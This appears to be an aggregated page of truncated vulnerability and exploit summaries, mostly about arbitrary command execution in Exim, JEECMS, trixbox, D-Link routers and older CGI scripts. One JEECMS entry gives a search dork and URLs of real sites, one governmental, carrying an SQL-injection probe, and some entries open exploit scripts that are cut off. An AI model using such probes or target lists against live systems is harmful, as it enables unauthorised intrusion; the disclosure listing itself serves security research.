CVE-2014-2972

expand.c in Exim before 4.83 expands mathematical comparisons twice, which allows local users to gain privileges and execute arbitrary commands via a crafted lookup value...

JEECMS任意命令执行漏洞（涉及大量案例，Administrator权限）

简要描述： JEECMS任意命令执行漏洞（涉及大量案例，Administrator权限） 详细说明： 谷歌搜索：inurl:jeecms/ArtiSearch.do 涉及大量案例 http://www.wwxzfw.gov.cn/jeecms/ArtiSearch.do?count=10&searchKey=a%27+and+1%3D1&chnlId= http://www.cnfamily.com/family/jeecms/ArtiSearch.do?count=10&searchKey=%C1%BD%BB%E1...

CVE-2014-5112

maint/modules/home/index.php in Fonality trixbox allows remote attackers to execute arbitrary commands via shell metacharacters in the lang parameter...

HP Data Protector 8.x Arbitrary Command Execution (HPSBMU03072)

Binary data hpdataprotectorhpsbmu03072.nbin...

AlienVault OSSIM av-centerd Util.pm get_license Arbitrary Command Execution (CVE-2014-3805)

An arbitrary command execution vulnerability exists in AlienVault OSSIM. The vulnerability is due to a failure to safely sanitize user data while handling SOAP service requests via the getlicense function of Util.pm. A remote unauthenticated attacker can exploit this vulnerability by sending...

CVE-2014-3486

The CVE-2014-3486 entry affects Red Hat CloudForms 3.0 Management Engine (CFME) before 5.2.4.2. A local attacker could exploit a symlink attack on a temporary file with a predictable name via two components: the shell_exec function in lib/util/MiqSshUtilV1.rb and the temp_cmd_file function in lib...

BSDI BSD/OS <= 2.1,Caldera OpenLinux Standard 1.0,Data General DG/UX <= 5.4 4.11,IBM AIX <= 4.3,ISC

No description provided by source. source: http://www.securityfocus.com/bid/134/info A buffer overflow exists in certain versions of BIND, the nameserver daemon currently maintained by the Internet Software Consortium ISC. BIND fails to properly bound the data recieved when processing an inverse...

Matt Kruse Calendar Script 2.2 Arbitrary Command Execution

No description provided by source. source: http://www.securityfocus.com/bid/1215/info Matt Kruse's Calendar script is a popular, free perl cgi-script used by many websites on the Internet. It allows a website administrator to easily setup and customize a calendar on their website. There are two...

Hylafax 4.1/4.2 - Multiple Scripts Remote Command Execution Vulnerability

No description provided by source. source: http://www.securityfocus.com/bid/16151/info HylaFAX is vulnerable to multiple arbitrary command-execution vulnerabilities. This issue is due to a failure in the application to properly sanitize user-supplied input. These vulnerabilities allow an attacker...

Hassan Consulting Shopping Cart 1.23 Arbitrary Command Execution Vulnerability

No description provided by source. source: http://www.securityfocus.com/bid/3308/info Hassan Consulting's Shopping Cart is commercial web store software. Shopping Cart does not filter certain types of user-supplied input from web requests. This makes it possible for a malicious user to submit a...

CGIScript.NET csMailto Hidden Form Field Remote Command Execution Vulnerability

No description provided by source. source: http://www.securityfocus.com/bid/4579/info CGIScript.NET csMailto is a Perl script designed to support multiple mailto: forms. A vulnerability has been reported in some versions of this script. Reportedly, configuration values used by the script are...

Sendfile 1.x/2.1 Forced Privilege Lowering Failure Vulnerability

No description provided by source. source: http://www.securityfocus.com/bid/2652/info Sendfile is an implementation of the SAFT simple asynchronous file transfer protocol for UNIX systems. A serialization error exists in the Sendfile daemon, sendfiled. When used in conjunction with other problems...

D-Link DSR Router Series - Remote Root Shell Exploit

No description provided by source. !/usr/bin/python CVEs: CVE-2013-5945 - Authentication Bypass by SQL-Injection CVE-2013-5946 - Privilege Escalation by Arbitrary Command Execution Vulnerable Routers: D-Link DSR-150 Firmware v1.08B44 D-Link DSR-150N Firmware v1.05B64 D-Link DSR-250 and DSR-250N...

CoreHTTP 0.5.3.1 (CGI) - Arbitrary Command Execution Vulnerability

No description provided by source. Package name: CoreHTTP server Version: 0.5.3.1 and below as long as cgi support is enabled Software URL: http://corehttp.sourceforge.net/ Exploit: http://aconole.brad-x.com/programs/corehttpcgienabled.rb Issue: CoreHTTP server fails to properly sanitize input...

3R Soft MailStudio 2000 2.0 userreg.cgi Arbitrary Command Execution

No description provided by source. source: http://www.securityfocus.com/bid/1335/info MailStudio 2000 is vulnerable to multiple attacks. It is possible for a remote user to gain read access to all files located on the server via the usage of the /.. string passed to a CGI, thereby compromising th...

RedHat 6.2/7.0 Tmpwatch Arbitrary Command Execution Vulnerability

No description provided by source. source: http://www.securityfocus.com/bid/1785/info A vulnerability exists in tmpwatch, a utility which automates the removal of temporary files in unix-like systems. An optional component of tmpwatch, fuser, improperly handles arguments to system library calls. ...

Snoopy 0.9x/1.0/1.2 Arbitrary Command Execution Vulnerability

No description provided by source. source: http://www.securityfocus.com/bid/15213/info Snoopy is prone to a vulnerability that lets attackers execute arbitrary commands because the application fails to properly sanitize user-supplied input. This issue may facilitate unauthorized remote access to...

thttpd <= 2.24 HTTP Request Escape Sequence Terminal Command Injection

No description provided by source. source: http://www.securityfocus.com/bid/37714/info Acme 'thttpd' and 'minihttpd' are prone to a command-injection vulnerability because they fail to adequately sanitize user-supplied input in logfiles. Attackers can exploit this issue to execute arbitrary...

DD-WRT HTTP Daemon Arbitrary Command Execution

No description provided by source...

Family Connections less.php Remote Command Execution

No description provided by source. This file is part of the Metasploit Framework and may be subject to redistribution and commercial restrictions. Please see the Metasploit Framework web site for more information on licensing and terms of use. http://metasploit.com/framework/ require 'msf/core'...